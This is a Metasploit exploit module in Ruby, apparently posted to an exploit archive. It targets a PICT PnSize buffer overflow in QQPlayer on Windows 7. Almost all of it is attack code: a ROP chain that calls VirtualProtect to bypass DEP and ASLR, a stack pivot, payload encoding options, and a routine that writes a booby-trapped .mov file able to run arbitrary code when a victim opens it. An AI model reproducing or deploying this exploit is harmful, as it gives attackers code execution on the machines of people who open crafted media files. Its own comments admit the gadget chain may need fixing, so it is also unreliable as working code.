QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS', 'Description' => %q{ This module exploits a vulnerability in QQPLAYER Player 3.2. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'hellok', #special thank corelanc0d3r for 'mona' ], 'References' => [ ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 750, 'BadChars' => "", #Memcpy 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'DisableNops' => 'True', 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", 'EncoderOptions' => { 'BufferRegister' => 'ECX', }, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7', { 'Ret' => 0x67664cde } ], ], 'Privileged' => false, 'DisclosureDate' => '11 21 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]), ], self.class) end def exploit # !mona rop rop_gadgets = [ 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x12345678, 0x67664CE4, 0x01020304, 0x10203040, 0x22331122, 0x23456789, 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x00a9c18c, # <- *&VirtualProtect() 0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe) #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe) 0x008cf099, # XCHG EAX,ESI # RETN 0x6497aaad, # POP EBP # RETN (avformat-52.dll) 0x100272bf, # ptr to 'call esp' (from i18nu.dll) 0x005fc00b, # POP EBX # RETN (QQPlayer.exe) 0x00000331, # <- change size to mark as executable if needed (-> ebx) 0x00418007, # POP ECX # RETN (QQPlayer.exe) 0x63d18000, # RW pointer (lpOldProtect) (-> ecx) 0x63d05001, # POP EDI # RETN (avutil-49.dll) 0x63d05002, # ROP NOP (-> edi) 0x008bf00b, # POP EDX # RETN (QQPlayer.exe) 0x00000040, # newProtect (0x40) (-> edx) 0x00468800, # POP EAX # RETN (QQPlayer.exe) 0x90909090, # NOPS (-> eax) 0x008bad5c, # PUSHAD # RETN (QQPlayer.exe) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*") stackpivot = [target.ret].pack('L') buffer =rand_text_alpha_upper(90)#2 buffer << rop_gadgets buffer << payload.encoded junk = rand_text_alpha_upper(2306 - buffer.length) buffer << junk buffer << stackpivot buffer << rand_text_alpha_upper(3000)#3000 path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" ) fd = File.open(path, "rb" ) sploit = fd.read(fd.stat.size) fd.close sploit << buffer file_create(sploit) end end